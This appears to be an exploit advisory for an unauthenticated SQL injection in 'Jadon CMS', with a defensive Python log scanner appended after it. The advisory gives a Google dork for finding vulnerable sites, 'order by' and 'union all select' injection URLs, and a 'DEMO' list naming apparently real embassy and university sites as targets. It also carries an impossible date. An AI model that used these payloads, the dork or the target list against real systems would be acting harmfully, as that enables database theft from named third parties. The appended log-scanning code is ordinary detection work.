###########################
# INDIAN EMBASSY Jadon CMS SQL INJECTION Vulnerability
###########################
=========================================================
[+] Title :- INDIAN EMBASSY Jadon CMS - SQL INJECTION
[+] Date :- 32 - july - 2016
[+] Vendor Homepage :- http://jadontech.com/
[+] Version :- All Versions
[+] Tested on :- Linux - Windows - Mac
[+] Category :- webapps
[+] Google Dorks :- "Designed by Jadon Technologies" or inurl:/news_detail.php?in_id= site:.in
[+] Exploit Author :- Natasya A.K.A codestack
[+] Team name :- codegirl , girls-silent , anongirls
[+] Official Website :- www.codegirlmovie.com
[+] Available :- sql injection cheat sheet | sql injection Havij
[+] Greedz to :- Indonesian People | Keep-silent | Hmei7
[+] Contact :- admin@kpu.go.id
=========================================================
[+] Severity Level :- High
[+] Request Method(s) :- GET / POST
[+] Vulnerable Parameter(s) :- id, newsid=
[+] Affected Area(s) :- Entire admin, database, Server
[+] About :- Unauthenticated SQL injection via multiple PHP files, causing an SQL error
[+] SQL vulnerable File :- /home/DOMAIN/public_html/XXX.php
[+] POC :- http://127.0.0.1/news_detail.php?id=[SQL]'
The SQL injection vulnerability can be exploited by remote attackers without any web-application user account privileges or user interaction.
http://www.[WEBSITE].com/news_detail.php?id=63' order by [SQL INJECTION]--+
http://www.[WEBSITE].com/news_detail.php?id=63' union all select [SQL INJECTION]--+
[+] DEMO :- http://www.jecrcudml.edu.in/news_detail.php?id=17'
http://www.embindia.org/news_detail.php?id=21
http://eoilisbon.in/news_detail.php?id=6
=======================================================
###########################
# Discovered Analyze by : Ternate-Labs Pentesting
###########################
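
For site operators checking whether these parameters have been probed, the following is an added example, not part of the original advisory or the vendor's code. It scans web access logs for non-numeric values in the parameters the advisory names. It assumes combined-format logs and that the CMS expects plain decimal record ids; the log lines and the file name gallery.php are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the advisory names (id, newsid) plus in_id from its search string.
WATCHED_PARAMS = {"id", "newsid", "in_id"}
# Assumption: the CMS expects these parameters to be plain decimal record ids.
NUMERIC_ID = re.compile(r"\d{1,10}")
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def suspicious_params(log_line):
    """Return [(param, decoded_value)] for watched params that are not numeric."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    # The advisory says multiple PHP files are affected, so check every .php path.
    if not url.path.lower().endswith(".php"):
        return []
    hits = []
    # parse_qsl percent-decodes, so %27 is compared as a literal single quote.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name.lower() in WATCHED_PARAMS and not NUMERIC_ID.fullmatch(value):
            hits.append((name, value))
    return hits


def scan(lines):
    """Yield (client_ip, param, value) for every flagged request."""
    for line in lines:
        for name, value in suspicious_params(line):
            yield line.split(" ", 1)[0], name, value


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Aug/2016:10:00:01 +0000] "GET /news_detail.php?id=63 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Aug/2016:10:00:05 +0000] "GET /news_detail.php?id=63%27 HTTP/1.1" 200 412',
    '198.51.100.7 - - [01/Aug/2016:10:00:09 +0000] "GET /gallery.php?newsid=12%27&page=2 HTTP/1.1" 200 398',
    '203.0.113.4 - - [01/Aug/2016:10:02:00 +0000] "GET /style.css?id=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, name, value in scan(SAMPLE_LOG):
        print(f"{ip} sent non-numeric {name}={value!r}")
```

Access logs normally record only the query string, so this covers the GET case; requests using POST need the check applied to the request body at the application or WAF layer.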